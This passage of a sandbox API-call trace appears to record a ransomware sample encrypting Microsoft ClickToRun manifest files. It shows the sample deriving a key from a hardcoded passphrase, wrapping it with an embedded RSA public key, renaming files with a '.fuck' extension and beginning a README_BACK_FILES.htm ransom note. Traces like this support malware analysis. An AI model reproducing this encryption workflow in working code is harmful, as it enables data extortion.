dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.896] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.897] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x287fb98) returned 1 [0238.899] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0238.899] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.899] CryptHashData (hHash=0x2893ab0, pbData=0x2884f08, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.899] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893ab0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2893f70) returned 1 [0238.899] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.899] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0238.900] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2882260) returned 1 [0238.900] CryptImportPublicKeyInfo (in: hCryptProv=0x2882260, dwCertEncodingType=0x1, pInfo=0x286c788*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c7b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c7c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2893bb0) returned 1 [0238.900] CryptEncrypt (in: hKey=0x2893bb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0238.900] CryptEncrypt (in: hKey=0x2893bb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882c78*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2882c78*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0238.900] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882c78, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.900] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9cacc*=0x0, lpOverlapped=0x0) returned 0 [0238.901] CryptEncrypt (in: hKey=0x2893f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x10) returned 1 [0238.901] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.901] CloseHandle (hObject=0xffffffff) returned 1 [0238.901] CloseHandle (hObject=0xffffffff) returned 1 [0238.901] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), bFailIfExists=0) returned 0 [0238.904] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", dwFileAttributes=0x0) returned 0 [0238.905] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.gsg")) returned 0 [0238.905] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.fuck")) returned 0 [0238.906] CryptDestroyHash (hHash=0x2893ab0) returned 1 [0238.906] CryptDestroyKey (hKey=0x2893f70) returned 1 [0238.906] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.906] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0238.906] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0238.906] GetLastError () returned 0x5 [0238.906] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml")) returned 0x20 [0238.906] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", dwFileAttributes=0x80) returned 0 [0238.907] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.907] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.908] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.908] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x287fb98) returned 1 [0238.911] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0238.911] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.911] CryptHashData (hHash=0x2894130, pbData=0x2884f08, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.911] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2894130, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2893eb0) returned 1 [0238.911] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.912] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0238.912] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2881c00) returned 1 [0238.912] CryptImportPublicKeyInfo (in: hCryptProv=0x2881c00, dwCertEncodingType=0x1, pInfo=0x2896c20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896c50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896c58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x28941f0) returned 1 [0238.913] CryptEncrypt (in: hKey=0x28941f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0238.913] CryptEncrypt (in: hKey=0x28941f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881d10*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2881d10*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0238.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881d10, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.913] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9cacc*=0x0, lpOverlapped=0x0) returned 0 [0238.913] CryptEncrypt (in: hKey=0x2893eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x10) returned 1 [0238.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.913] CloseHandle (hObject=0xffffffff) returned 1 [0238.913] CloseHandle (hObject=0xffffffff) returned 1 [0238.913] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), bFailIfExists=0) returned 0 [0238.914] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", dwFileAttributes=0x0) returned 0 [0238.914] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.gsg")) returned 0 [0238.915] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.fuck")) returned 0 [0238.915] CryptDestroyHash (hHash=0x2894130) returned 1 [0238.915] CryptDestroyKey (hKey=0x2893eb0) returned 1 [0238.915] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.915] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0238.915] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0238.915] GetLastError () returned 0x5 [0238.915] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml")) returned 0x20 [0238.916] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", dwFileAttributes=0x80) returned 0 [0238.916] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.917] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.917] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.918] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x287fb98) returned 1 [0238.920] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0238.920] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.920] CryptHashData (hHash=0x2893d30, pbData=0x28850e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.920] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893d30, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2894030) returned 1 [0238.921] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.921] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0238.921] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28822e8) returned 1 [0238.921] CryptImportPublicKeyInfo (in: hCryptProv=0x28822e8, dwCertEncodingType=0x1, pInfo=0x2896740*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896770*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896778*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x28940b0) returned 1 [0238.921] CryptEncrypt (in: hKey=0x28940b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0238.921] CryptEncrypt (in: hKey=0x28940b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28829d0*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28829d0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0238.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28829d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.922] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9cacc*=0x0, lpOverlapped=0x0) returned 0 [0238.922] CryptEncrypt (in: hKey=0x2894030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9cacc*=0x10) returned 1 [0238.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0) returned 0 [0238.922] CloseHandle (hObject=0xffffffff) returned 1 [0238.922] CloseHandle (hObject=0xffffffff) returned 1 [0238.922] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), bFailIfExists=0) returned 0 [0238.922] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", dwFileAttributes=0x0) returned 0 [0238.923] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.gsg")) returned 0 [0238.924] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.fuck")) returned 0 [0238.924] CryptDestroyHash (hHash=0x2893d30) returned 1 [0238.924] CryptDestroyKey (hKey=0x2894030) returned 1 [0238.924] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.924] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0238.924] FindClose (in: hFindFile=0x2893e30 | out: hFindFile=0x2893e30) returned 1 [0238.925] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\readme_back_files.htm")) returned 0xffffffff [0238.925] AreFileApisANSI () returned 1 [0238.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 170 [0238.925] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\README_BACK_FILES.htm" (normalized: 